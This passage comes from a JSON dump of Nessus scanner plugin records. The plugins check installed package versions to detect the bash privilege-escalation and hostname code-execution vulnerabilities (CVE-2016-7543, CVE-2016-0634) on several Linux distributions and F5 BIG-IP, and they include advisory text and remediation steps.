audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"bash-4.3.43-4.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:02", "description": "According to the version of the bash package installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - Bash before 4.4 allows local users to execute arbitrary commands with root privileges via crafted SHELLOPTS and PS4 environment variables(CVE-2016-7543).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : bash (EulerOS-SA-2017-1032)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7543"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:bash", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1032.NASL", "href": "https://www.tenable.com/plugins/nessus/99877", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99877);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-7543\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : bash (EulerOS-SA-2017-1032)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the bash package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Bash before 4.4 allows local users to execute arbitrary\n commands with root privileges via crafted SHELLOPTS and\n PS4 environment variables(CVE-2016-7543).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1032\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dabde365\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"bash-4.2.46-19.h2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:52", "description": "According to the version of the bash package installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - Bash before 4.4 allows local users to execute arbitrary commands with root privileges via crafted SHELLOPTS and PS4 environment variables(CVE-2016-7543).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : bash (EulerOS-SA-2017-1031)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7543"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:bash", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1031.NASL", "href": "https://www.tenable.com/plugins/nessus/99876", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99876);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-7543\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : bash (EulerOS-SA-2017-1031)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the bash package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - Bash before 4.4 allows local users to execute arbitrary\n commands with root privileges via crafted SHELLOPTS and\n PS4 environment variables(CVE-2016-7543).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1031\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?58d37b9d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"bash-4.2.46-19.h2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:34:03", "description": "Bash before 4.4 allows local users to execute arbitrary commands with root privileges via crafted SHELLOPTS and PS4 environment variables.\n(CVE-2016-7543)", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-28T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Bash vulnerability (K73705133)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7543"], "modified": "2020-03-09T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL73705133.NASL", "href": "https://www.tenable.com/plugins/nessus/105470", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K73705133.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105470);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/09\");\n\n script_cve_id(\"CVE-2016-7543\");\n\n script_name(english:\"F5 Networks BIG-IP : Bash vulnerability (K73705133)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bash before 4.4 allows local users to execute arbitrary commands with\nroot privileges via crafted SHELLOPTS and PS4 environment variables.\n(CVE-2016-7543)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K73705133\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K73705133.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K73705133\";\nvmatrix = make_array();\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\",\"11.4.0-11.6.2\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"13.1.0\",\"12.1.3\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\",\"11.4.0-11.6.2\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"13.1.0\",\"12.1.3\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\",\"11.4.0-11.6.2\",\"11.2.1\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"13.1.0\",\"12.1.3\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\",\"11.4.0-11.6.2\",\"11.2.1\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"13.1.0\",\"12.1.3\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\",\"11.4.0-11.6.2\",\"11.2.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"13.1.0\",\"12.1.3\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\",\"11.4.0-11.6.2\",\"11.2.1\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"13.1.0\",\"12.1.3\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\",\"11.4.0-11.6.2\",\"11.2.1\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"13.1.0\",\"12.1.3\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\",\"11.4.0-11.6.2\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"13.1.0\",\"12.1.3\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-25T17:22:12", "description": "An update of the bash package has been released.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Bash PHSA-2017-0040", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634"], "modified": "2022-05-24T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:bash", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0040_BASH.NASL", "href": "https://www.tenable.com/plugins/nessus/121741", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0040. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121741);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/24\");\n\n script_cve_id(\"CVE-2016-0634\");\n\n script_name(english:\"Photon OS 1.0: Bash PHSA-2017-0040\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the bash package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-80.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0634\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"bash-4.3.48-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"bash-debuginfo-4.3.48-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"bash-lang-4.3.48-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:38:51", "description": "The remote host is affected by the vulnerability described in GLSA-201612-39 (Bash: Arbitrary code execution)\n\n A vulnerability was found in the way Bash expands $HOSTNAME. Injecting malicious code into $HOSTNAME could cause it to run each time Bash expands \\\\h in the prompt string.\n Impact :\n\n A remote attacker controlling the system’s hostname (i.e. via DHCP) could possibly execute arbitrary code with the privileges of the process, or cause a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-13T00:00:00", "type": "nessus", "title": "GLSA-201612-39 : Bash: Arbitrary code execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0634"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:bash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201612-39.NASL", "href": "https://www.tenable.com/plugins/nessus/95742", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201612-39.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95742);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-0634\");\n script_xref(name:\"GLSA\", value:\"201612-39\");\n\n script_name(english:\"GLSA-201612-39 : Bash: Arbitrary code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201612-39\n(Bash: Arbitrary code execution)\n\n A vulnerability was found in the way Bash expands $HOSTNAME. Injecting\n malicious code into $HOSTNAME could cause it to run each time Bash\n expands \\\\h in the prompt string.\n \nImpact :\n\n A remote attacker controlling the system’s hostname (i.e. via DHCP)\n could possibly execute arbitrary code with the privileges of the process,\n or cause a Denial of\n Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201612-39\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Bash users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.3_p46-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 